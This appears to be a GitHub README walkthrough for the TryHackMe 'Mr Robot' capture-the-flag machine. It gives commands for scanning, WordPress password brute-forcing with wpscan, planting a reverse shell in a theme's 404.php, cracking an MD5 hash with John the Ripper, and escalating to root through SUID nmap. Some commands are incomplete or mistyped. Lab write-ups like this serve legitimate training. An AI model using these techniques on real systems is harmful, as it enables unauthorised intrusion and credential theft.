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File metadata and controls

49 lines (37 loc) · 2.31 KB


#created this repo as a guide to mrrobot CTF/Vuln machine follow the steps have fun ! QMARK CTF


#download the vpn file to connect tryhackme server

#save in desktop

#open terminal in the folder and type command [sudo openvpn filename.octozion.ovpn] //if you dont have openvpn installed follow this link

#Join the room

#Task 1:instructions

#Task2 :

KEY1 & 2 & 3 :
#Cope the IP Address to the clipboard
#Open terminal  make a folder to work with this CTF using the command [mkdir]
#Run nmap on the ip address [sudo nmap -sV -A -sC | tee nmapout.txt ]       //network scan and storing the result in nmapout.txt
#Port  80 is open
#Use burp suit > proxy > open browser > intercept off and paste the ip address
#Use gobuster with the wordlist downloaded from my githum [sudo gobuster -u dir -w wordlistgobuster.txt -x .txt | tee gobusterout.txt]
#Found /wp-admin , robots.txt
#check both the url
#on checking robots.txt you'll get they open the [IP/key-1-of-3.txt] **1st key**

#Use wp-scan [ sudo wpscan --url --passwords simplefsociety.txt -U simplefsociety.txt ]
#Download the shell
#inside wp dashboard go to  appreance and editor
#edit in 404.php code ane save and use netcat [nc -lvnp 1234 ]
#To make the session more stabel [ python -c 'import pty;pty.spawn("/bin/bash")' ]
#now to goto /home/robot two file now use command [cat password.raw-md5 ]
#copy the md5 has and use john the ripper and save as mrrobot.hash
#use john the ripper tool   [sudo john mrrobot.hash --wordlist=simplefsociety.txt --format=Raw-MD5]
#got the password abcdefghijklmnopqrstuvwxyz
#type su robot and type the password and cat the **2nd key**

#use the command [find / -perm +6000 2>/dev/null | grep '/bin'] which checks the privilage excaltion to goto root
#nmap is inside it 
#now use	to  get the command for privillage excalation
#nmap --interactive     //command to shift nmap interactive mode
#nmap> !sh      //command to shit root
# ls /root/     //gives the third key
# cat the final **3rd key**